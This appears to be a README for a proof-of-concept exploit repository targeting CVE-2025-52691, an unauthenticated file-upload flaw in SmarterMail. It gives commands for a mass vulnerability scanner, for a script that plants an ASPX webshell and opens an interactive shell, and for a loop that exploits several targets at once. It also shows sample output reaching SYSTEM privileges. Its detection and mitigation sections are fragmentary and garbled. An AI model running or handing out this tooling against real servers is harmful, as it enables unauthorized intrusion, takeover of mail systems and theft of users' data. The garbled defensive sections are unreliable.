
Proof of Concept for CVE-2025-52691 - SmarterMail Unauthenticated Arbitrary File Upload RCE
For authorized security testing and educational purposes only. Unauthorized access is illegal.
Critical vulnerability in SmarterMail allowing unauthenticated arbitrary file upload via path traversal, leading to Remote Code Execution.
Vulnerability: Path traversal in upload endpoints allows uploading ASPX webshells to web root
Impact: Unauthenticated Remote Code Execution
Vector: Network / Unauthenticated
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3
Scans targets for CVE-2025-52691 vulnerability. Saves only vulnerable URLs to output file.
# Single target
python check.py https://mail.example.com
# Multiple targets
python check.py -f targets.txt -o results.txt
# Custom timeout
python check.py https://mail.example.com -t 30
Output: One vulnerable URL per line in results.txt
Uploads ASPX webshell and provides command execution.
# Basic exploit
python pwn.py https://mail.example.com
# Execute command
python pwn.py https://mail.example.com -c "whoami"
# Interactive shell
python pwn.py https://mail.example.com -i
Reusable exploitation module for integration into custom scripts.
As Library:
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()
# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
print(exploit.execute_command("whoami"))
print(exploit.execute_command("hostname"))
print(exploit.execute_command("ipconfig"))
As Standalone Script:
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"
# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult
targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
config = TargetConfig(base_url=target)
exploit = SmarterMailExploit(config)
if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
print(f"[+] Exploited: {target}")
print(exploit.execute_command("whoami"))
EOF
python my_exploit.py
Vulnerable Endpoints:
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx
Exploitation Methods:
../wwwroot/)Webshell: Minimal ASPX shell accepting commands via ?cmd= parameter
python check.py <target>python pwn.py <target> -iDetection:
../)/api/upload requestsMitigation:
$ python pwn.py https://mail.example.com -c "whoami"
[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx
[*] Executing: whoami
[+] Output:
nt authority\system
Always obtain proper authorization before testing.